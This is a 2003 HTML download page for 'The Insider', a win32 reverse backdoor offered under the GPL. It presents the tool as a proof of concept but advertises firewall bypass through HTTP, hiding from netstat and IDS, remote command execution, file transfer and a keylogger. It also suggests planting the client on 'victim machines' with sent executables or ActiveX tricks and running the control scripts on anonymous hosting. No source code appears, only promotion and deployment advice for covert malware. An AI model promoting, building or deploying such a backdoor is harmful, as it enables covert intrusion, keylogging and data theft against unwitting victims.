<html>

<head>
<title>The Insider</title>
</head>
<body bgcolor="#EEEFFF">

<h2>The Insider - win32 reverse backdoor</h2>

<b>Latest is Insider 2.3.1</b> <a href=Insider-2.3.0.zip>[download]</a>

<p>

This is a proof of concept implementation of win32 reverse backdoor program
called the Insider. Unlike many other backdoor programs, Insider is not
server listening some tcp/udp port, it is a client program that communicates
with the server part through http protocol. This design has some unique
features:

<p>
<ul>
<li> Pass through almost any corporate firewall (it can automatically
  detect proxy settings if needed)
<li> No listening services found with "netstat -an"
<li> Easy to hide from IDS - communication seems like a normal web browsing
<li> Web interface for client management
</ul>

<a href="sample.html">See the management interface</a>.

<p>
Insider network consists of the following parts:

<ul>
<li> Client(s) on victim machine(s)
<li> 2 cgi scripts: a driver script "cc.cgi" that communicates with the clients
  and a script "master.cgi" that gives a user interface to Insider network.
</ul>

<p>
Client is a simple win32 program that is distributed on victim machine in
some way - send some executable to victim, do some ActiveX tricks, whatever.
The client features:

<p>
<ul>
<li>Automatic http proxy detection
<li>Automatic proxy authentication (Version 2 only)
<li>System command execution
<li>File download/upload (Version 2 only)
<li>Simple keylogger (Version 2, NT/2000/XP only)
<li>Uninstallation (Version 2 only)
<li>OS shutdown/reboot (Version 2 only)
</ul>

<p>
The cgi part can be installed on any server that can execute perl cgi scripts - 
anonymous hosting service should be fine.

<p>

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the 
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.
<p>
This program is distributed in the hope that it will be useful, but WITHOUT 
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
<p>

<b>Nick Snickers &lt; nick102799 (at) hotmail.com &gt;</b>

<p>

<hr noshade>
<i>Last updated Sep 20, 2003</i>

</body>
</html>
